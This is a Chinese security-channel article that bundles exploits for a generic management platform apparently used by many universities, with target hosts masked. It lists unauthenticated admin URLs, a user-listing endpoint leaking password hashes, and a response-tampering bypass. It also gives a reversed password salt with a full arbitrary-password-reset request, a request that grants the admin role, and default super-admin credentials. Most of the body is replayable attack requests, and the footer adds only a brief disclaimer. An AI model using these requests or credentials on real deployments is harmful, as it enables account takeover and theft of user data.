某通用打包

扫码领资料

获网安教程

前言

部分涉及账号来源于此篇https://bbs.zkaq.cn/t/31591.html
后续不要说明来源地址和重置信息

统一垂直

账号1信息

报文

功能点补充

发展中心后台未授权访问

url地址：http://xxx.edu.cn:8080/center/login/admin#/
未授权访问admin权限

服务门户后台管理未授权 && 垂直

保持统一认证登录状态，访问url地址：http://xxx.edu.cn/heportal/admin.html#/
说明：部分站点需CAS AUTH字段
直通是未授权

数据治理未授权 && 垂直

http://xxx.edu.cn:8002/data-quality/index.html#/manager

统一未授权

这个点最开始未授权直通，接口来源于重置的接口跟接口即可
地址1：https://xxx.com/userCtl/getPage?name=admin&page=1&size=10
通过naem指定用户列出用户账号，密码（sm3）值

统一只有这个是国标sm3，其他的m5
补一个m5贴图

表单垂直

HTTP/1.1 200
P3P: CP=CAO PSA OUR
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, DELETE
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: *
Content-Type: application/json
Date: Sun, 26 Jun 2022 00:45:37 GMT
Connection: close
Server: any version you want
Content-Length: 45

{"success":true,"errmsg":null,"result":false}
修改result字段 false修改为：true

未授权敏感泄露

同站不同接口

接口地址：data-quality/index.html#/abnormal_pyzy

目标管理系统弱口令

目标管理系统任意重置

ck带salt，js逆向过混淆跟值可逆到salt值为：qualty
将cookie进行使用，密码是654321的md5值（注：在加密之前需要加一个quality，例如重置为654321，需要加密的即为quality654321）

重置接口：/quality/restPassword

POST /quality/resetPassword HTTP/1.1
Host: xxx
Content-Length: 65
Accept: application/json, text/plain, /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Application-Name: nbzl_admin
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC
Connection: close

{"userId":"123","newpassword":"beab2c7769f424fd5ff0955b51f04dec"}

目标管理系统任意用户权限提升

需组合拳，任意重置配合使用

POST /quality/user/saveUserRoles HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Application-Name: nbzl_admin
Content-Length: 27
Connection: close
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC

{"id":"123","roleIds":"-2"}

roleids：-2是管理员id

目标管理系统任意删除

发展中心

同模板框架，上面目标管理系统该有的洞，这里都有 不多赘述

办事大厅

极少数有这个模块点

智慧教学

初始超级默认账密：admin/ABCDadmin
前缀ABCD 默认系统设置，可在系统管理中查看
部分站点存在后缀

这个是新旧两套系统
都是aes加密，需要js逆向拿iv 偏移量
通过aes可配置使用任意账号密码重置，这里的图丢失了

发展中心

可配和质管平台权限下发

写在最后

1、资产大概300+左右
2、每个子节点都是模块化设计，统一资产少，不代表资产就少
3、内网也挺多
SQL也很多，好多年前的 找不到了，将就看

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，
所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

没看够~？欢迎关注！
分享本文到朋友圈，可以凭截图找老师领取
上千教程+工具+靶场账号哦
原文始发于微信公众号（掌控安全EDU）：某通用打包